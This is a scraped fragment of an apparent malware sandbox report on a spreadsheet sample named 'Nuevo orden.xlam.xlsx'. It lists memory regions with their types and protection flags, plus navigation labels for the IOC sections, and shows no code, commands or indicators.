
stack

page read and write

9350000

trusted library allocation

page read and write

4CC000

heap

page read and write

2400000

trusted library allocation

page read and write

48A000

heap

page read and write

4C5000

heap

page read and write

430E000

stack

page read and write

3190000

heap

page read and write

4CE000

heap

page read and write

7D0000

heap

page execute and read and write

4BD000

heap

page read and write

2361000

trusted library allocation

page read and write

23FA000

trusted library allocation

page read and write

B0000

trusted library allocation

page read and write

A90000

trusted library allocation

page read and write

2CB8000

heap

page read and write

49B000

heap

page read and write

5D0000

heap

page read and write

2C0E000

stack

page read and write

4B6E000

stack

page read and write

4BD000

heap

page read and write

484000

heap

page read and write

5B9E000

stack

page read and write

4EF0000

heap

page read and write

2D00000

heap

page read and write

48E000

stack

page read and write

245F000

stack

page read and write

5F2F000

stack

page read and write

2CB4000

heap

page read and write

4B6000

heap

page read and write

439C000

stack

page read and write

250000

trusted library allocation

page read and write

3279000

trusted library allocation

page read and write

4BD000

heap

page read and write

2A9E000

stack

page read and write

3251000

trusted library allocation

page read and write

443000

heap

page read and write

5C92000

heap

page read and write

6B5000

heap

page read and write

475000

heap

page read and write

D8E000

stack

page read and write

48A000

heap

page read and write

12B000

trusted library allocation

page execute and read and write

3C8E000

stack

page read and write

485000

heap

page read and write

4C5000

heap

page read and write

9350000

trusted library allocation

page read and write

4A5D000

stack

page read and write

89A0000

heap

page read and write

32B0000

trusted library allocation

page read and write

5B0000

heap

page read and write

43DB000

stack

page read and write

4A4E000

stack

page read and write

461E000

stack

page read and write

4500000

trusted library allocation

page read and write

442B000

stack

page read and write

9350000

trusted library allocation

page read and write

4F52000

heap

page read and write

320E000

stack

page read and write

554000

heap

page read and write

2E60000

heap

page read and write

4BD000

heap

page read and write

492000

heap

page read and write

4F49000

heap

page read and write

3A0000

heap

page read and write

4AD000

heap

page read and write

9350000

trusted library allocation

page read and write

2C4E000

stack

page read and write

8EBD000

stack

page read and write

7EF20000

trusted library allocation

page execute and read and write

CCE000

stack

page read and write | page guard

4CE000

heap

page read and write

4B6000

heap

page read and write

2044000

heap

page read and write

460000

heap

page read and write

1FFF000

stack

page read and write

4D9E000

stack

page read and write

9350000

trusted library allocation

page read and write

475000

heap

page read and write

910F000

stack

page read and write

D2000

trusted library allocation

page read and write

4C5000

heap

page read and write

2AA0000

heap

page read and write

A0F000

stack

page read and write

49C000

heap

page read and write

2C9F000

stack

page read and write

2428000

trusted library allocation

page read and write

4430000

trusted library allocation

page read and write

487000

heap

page read and write

310000

heap

page read and write

4334000

trusted library allocation

page read and write

4FAC000

stack

page read and write

455C000

stack

page read and write

32B0000

trusted library allocation

page read and write

898C000

stack

page read and write

42C0000

trusted library allocation

page read and write

9350000

trusted library allocation

page read and write

49B000

heap

page read and write

483000

heap

page read and write

1EA000

trusted library allocation

page read and write

524D000

stack

page read and write

482D000

stack

page read and write

533000

heap

page read and write

4EE0000

heap

page read and write

434000

heap

page read and write

B4000

trusted library allocation

page read and write

33E0000

heap

page read and write

16C000

stack

page read and write

18A000

stack

page read and write

1F42000

heap

page read and write

450000

heap

page read and write

580000

trusted library allocation

page execute and read and write

478000

heap

page read and write

483000

heap

page read and write

5D80000

heap

page read and write

122000

trusted library allocation

page read and write

49B000

heap

page read and write

4BDD000

stack

page read and write

45CA000

stack

page read and write

8FBF000

stack

page read and write

4BD000

heap

page read and write

3620000

heap

page read and write

87ED000

heap

page read and write

5E7000

heap

page read and write

92E0000

trusted library allocation

page read and write

1EFF000

stack

page read and write

There are 443 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
Nuevo orden.xlam.xlsx

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportNuevo orden.xlam.xlsx

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
Nuevo orden.xlam.xlsx